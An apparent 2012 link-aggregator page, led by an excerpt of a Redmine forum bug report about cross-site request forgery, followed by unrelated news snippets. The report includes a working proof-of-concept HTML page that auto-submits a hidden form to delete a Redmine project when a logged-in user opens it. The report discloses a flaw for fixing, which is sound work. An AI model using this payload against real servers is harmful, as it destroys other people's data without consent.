29 Feb '12, 4pm

#OWASP Redmine is still vulnerable against CSRF Redmine - It seems that Redmine is still vulnerable against CSRF S

It seems that Redmine is still vulnerable against CSRF. Scenario: - user is logged in at the redmine server - user follows a link that executes the following HTML Code - the project "deleteme" will be deleted automatically and the user will be logged out. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>CRSF Demonstration</title> </head> <body onload="javascript:fireForms()"> <script language="JavaScript"> function fireForms() { document.forms[0].submit(); } </script> <H2>CRSF Demonstration</H2> <form method="POST" name="form0" action="https://<server>/redmine/projects/deleteme"> <input type="hidden" name="_method" value="delete"/> <input type="hidden" name="confirm" value="1"/> <input type="hidden" name="commit" value="Delete"/> </form> </body> </html> I thought that this problem was fixed with rails 2.3.11 and CVE-2011-0447? I'm using ...

Full article: http://www.redmine.org/boards/1/topics/29215%3Fr%3D29246

Tweets

Is Math Still Relevant?

spectrum.ieee.org 01 Mar '12, 6pm

Long ago, when I was a freshman in ­engineering school, there was a required course in mechanical drawing. “You had better...

@Froggycia Btw, if you're still interested:

indiesin.com 02 Mar '12, 5am

We noticed you have javascript disabled. You'll need javascript enabled to access some of the features on the site, so ple...

que

guides.rubyonrails.org 04 Mar '12, 8pm

The attacker creates a valid session id: He loads the login page of the web application where he wants to fix the session,...

Not all of us are still blind, are we? - by May...

blog.limkitsiang.com 01 Mar '12, 5pm

— May Chee Chook Ying The Malaysian Insider Mar 01, 2012 MARCH 1 — Not too long ago in a land not so far-away, in the king...

よさげなテーマ / “ThemeRedAndy - Redmine”

よさげなテーマ / “ThemeRedAndy - Redmine”

redmine.org 29 Feb '12, 1am

Download the theme from Andriy Lesyuk website . Copy theme files (images and stylesheets directories) into public/themes/r...

still in 1 Peace: Al Linke's tiny breathalyzer ...

designnews.com 03 Mar '12, 10pm

As the cost of light-emitting diodes (LEDs) plummets, use of the devices is soaring in automotive applications. Automakers...

NASA's Project Morpheus Still Shooting for the Moon

NASA's Project Morpheus Still Shooting for the ...

spectrum.ieee.org 29 Feb '12, 12pm

Project Morpheus used to be called Project M , and it was an ambitious plan to send a Robonaut to the moon in under 1,000 ...

Redmine - Howto install Redmine on Heroku - Red...

redmine.org 10 Mar '12, 2am

Today I tried to install Redmine on Heroku. I handled the session store with no problem. When I tried to create the databa...

Feature#779 "Multiple SCM per project" も無事クローズ。...

redmine.org 27 Feb '12, 8am

Defect #2719 : Increase username length limit from 30 to 60 Defect #3087 : Revision referring to issues across all project...